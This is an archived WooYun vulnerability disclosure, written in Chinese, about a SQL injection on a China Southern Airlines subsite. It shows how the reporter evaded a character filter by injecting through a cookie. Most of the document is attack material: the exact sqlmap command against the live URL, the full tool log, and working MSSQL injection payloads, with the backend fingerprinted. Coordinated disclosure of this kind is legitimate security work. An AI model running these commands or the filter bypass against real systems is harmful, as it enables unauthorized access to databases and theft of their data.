乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-26: 细节已通知厂商并且等待厂商处理中 2015-12-28: 厂商已经确认,细节仅向厂商公开 2016-01-07: 细节向核心白帽子及相关领域专家公开 2016-01-17: 细节向普通白帽子公开 2016-01-27: 细节向实习白帽子公开 2016-02-09: 细节向公众公开
中国南方航空某站绕过封锁继续SQL注入
这位朋友的漏洞 WooYun: 中国南方航空某分站存在SQL注入漏洞 通过sqlmap截图 以及他的手工注入截图,可以看到当时系统还没有做任何封锁我检测到了这个链接:http://www.xjair.com/article.aspx?id=201511201801521300加入单引号,此时系统已经增加了封锁http://www.xjair.com/article.aspx?id=201511201801521300'提示禁止添加非法字符
【由此把普通注入语句 更改为 cookie注入】python sqlmap.py -u "http://www.xjair.com/article.aspx" --cookie "id=201511201801521300" --level 2 --current-db成功绕过系统封锁,实现注入【绕过方式】:
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: id (Cookie) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=201511201801521300' AND 5620=5620 AND 'CdDe'='CdDe Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: id=201511201801521300' AND 5657=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(112)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (5657=5657) THEN CHAR(49)ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(112)+CHAR(122)+CHAR(113))) AND 'aOBp'='aOBp Type: UNION query Title: Generic UNION query (NULL) - 14 columns Payload: id=201511201801521300' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(112)+CHAR(112)+CHAR(107)+CHAR(113)+CHAR(107)+CHAR(75)+CHAR(98)+CHAR(112)+CHAR(120)+CHAR(79)+CHAR(87)+CHAR(115)+CHAR(106)+CHAR(86)+CHAR(113)+CHAR(113)+CHAR(112)+CHAR(122)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: id=201511201801521300'; WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: id=201511201801521300' WAITFOR DELAY '0:0:5'-----
【sqlmap截图】:
当前数据库:
【sqlmap全过程】:
[19:38:03] [INFO] testing connection to the target URL[19:38:04] [CRITICAL] heuristics detected that the target is protected by some kind of WAF/IPS/IDSdo you want sqlmap to try to detect backend WAF/IPS/IDS? [y/N] y[19:38:06] [INFO] using WAF scripts to detect backend WAF/IPS/IDS protection[19:38:06] [WARNING] no WAF/IDS/IPS product has been identified[19:38:06] [INFO] testing if the target URL is stable. This can take a couple of seconds[19:38:07] [WARNING] target URL is not stable. sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison'and provide a string or regular expression to match onhow do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit][19:38:43] [INFO] testing if Cookie parameter 'id' is dynamic[19:38:43] [INFO] confirming that Cookie parameter 'id' is dynamic[19:38:44] [INFO] Cookie parameter 'id' is dynamic[19:38:45] [WARNING] heuristic (basic) test shows that Cookie parameter 'id' might not be injectable[19:38:45] [INFO] testing for SQL injection on Cookie parameter 'id'[19:38:45] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'[19:38:51] [INFO] Cookie parameter 'id' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable[19:38:54] [INFO] heuristic (extended) test shows that the back-end DBMS could be 'Microsoft SQL Server'do you want to include all tests for 'Microsoft SQL Server' extending provided level (2) and risk (1) values? [Y/n][19:38:55] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'[19:38:56] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (EXTRACTVALUE)'[19:38:56] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or HAVING clause'[19:38:56] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'[19:38:57] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'[19:38:57] [INFO] Cookie parameter 'id' is 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' injectable[19:38:57] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'[19:38:57] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'[19:39:48] [INFO] Cookie parameter 'id' seems to be 'Microsoft SQL Server/Sybase stacked queries' injectable[19:39:48] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'[19:40:39] [INFO] Cookie parameter 'id' seems to be 'Microsoft SQL Server/Sybase time-based blind' injectable[19:40:39] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'[19:40:39] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found[19:40:47] [INFO] target URL appears to be UNION injectable with 14 columns[19:40:48] [INFO] Cookie parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectableCookie parameter 'id' is vulnerable. Do you want to keep testing the others (ifany)? [y/N]sqlmap identified the following injection points with a total of 55 HTTP(s) requests:---Parameter: id (Cookie) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=201511201801521300' AND 5620=5620 AND 'CdDe'='CdDe Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: id=201511201801521300' AND 5657=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(112)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (5657=5657) THEN CHAR(49)ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(112)+CHAR(122)+CHAR(113))) AND 'aOBp'='aOBp Type: UNION query Title: Generic UNION query (NULL) - 14 columns Payload: id=201511201801521300' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(112)+CHAR(112)+CHAR(107)+CHAR(113)+CHAR(107)+CHAR(75)+CHAR(98)+CHAR(112)+CHAR(120)+CHAR(79)+CHAR(87)+CHAR(115)+CHAR(106)+CHAR(86)+CHAR(113)+CHAR(113)+CHAR(112)+CHAR(122)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: id=201511201801521300'; WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: id=201511201801521300' WAITFOR DELAY '0:0:5'-----[19:41:05] [INFO] testing Microsoft SQL Server[19:41:05] [INFO] confirming Microsoft SQL Server[19:41:07] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0back-end DBMS: Microsoft SQL Server 2005
危害等级:中
漏洞Rank:10
确认时间:2015-12-28 09:30
感谢提醒
暂无